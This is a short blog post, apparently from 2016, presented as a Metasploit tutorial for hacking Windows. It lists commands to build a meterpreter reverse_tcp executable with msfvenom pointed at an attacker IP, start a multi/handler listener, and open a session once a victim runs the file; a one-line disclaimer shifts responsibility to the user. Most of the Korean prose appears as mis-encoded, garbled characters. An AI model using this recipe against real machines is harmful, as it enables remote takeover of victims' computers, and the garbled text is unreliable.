Metasploit

Kali Linux by pass - Hack Windows metasploit tutorial

๐“›๐“พ๐“ฌ๐“ฎ๐“ฝ๐“ฎ_๐“ข๐“ฝ๐“ฎ๐“ต๐“ต๐“ช 2016. 12. 22.
728x90
๋ฐ˜์‘ํ˜•


๋ชจ๋“  ์ฑ…์ž„์€ ์‚ฌ์šฉ์ž ๋ณธ์ธ์—๊ฒŒ ์žˆ์Šต๋‹ˆ๋‹ค.


๋จผ์ € 

service apache2 start

service postgresql start

service metasploit start

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[attacker ip] LPORT=[์›ํ•˜๋Š” ํฌํŠธ] -f exe > filename.exe


๊ทธ๋Ÿผ /root ํด๋”์— exeํŒŒ์ผ์ด ์ƒ๊ธด๊ฒƒ์„ ํ™•์ธํ• ์ˆ˜ ์žˆ๋‹ค.

๊ทธ๋Ÿผ ๋‹ค์Œ์œผ๋กœ๋Š” ์ปจํŠธ๋กคํ•  ํ•ธ๋“ค๋Ÿฌ๋ฅผ ๋งŒ๋“ค์–ด๋ณด์ž.


๋จผ์ € msfconsole์„ ์ž…๋ ฅํ•œ๋‹ค.


use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp [์šฐ๋ฆฌ๊ฐ€ ํŒŒ์ผ์„ ๋งŒ๋“ค๋•Œ ์‚ฌ์šฉํ•œ payload]

set LHOST [attacker ip]

set LPORT [ํŒŒ์ผ๋งŒ๋“ค๋•Œ ์ž…๋ ฅํ•œ ํฌํŠธ๋ฒˆํ˜ธ]

exploit -j

ํ•˜๊ณ  ๊ธฐ๋‹ค๋ฆฌ๋ฉด


victim PC์—์„œ ์‹คํ–‰์„ ํ•˜๋ฉด



์ด๋Ÿฌํ•œ ์ฐฝ์„ ๋ณผ์ˆ˜ ์žˆ๋‹ค.


sessions -i ๋ช…๋ น์–ด๋ฅผ ์ด์šฉํ•˜์—ฌ session id๋ฅผ ํ™•์ธํ•˜๊ณ  sessions -i [ID]์„ ์ž…๋ ฅํ•˜๋ฉด meterpreter ์„ฑ๊ณต!!



728x90
๋ฐ˜์‘ํ˜•

๋Œ“๊ธ€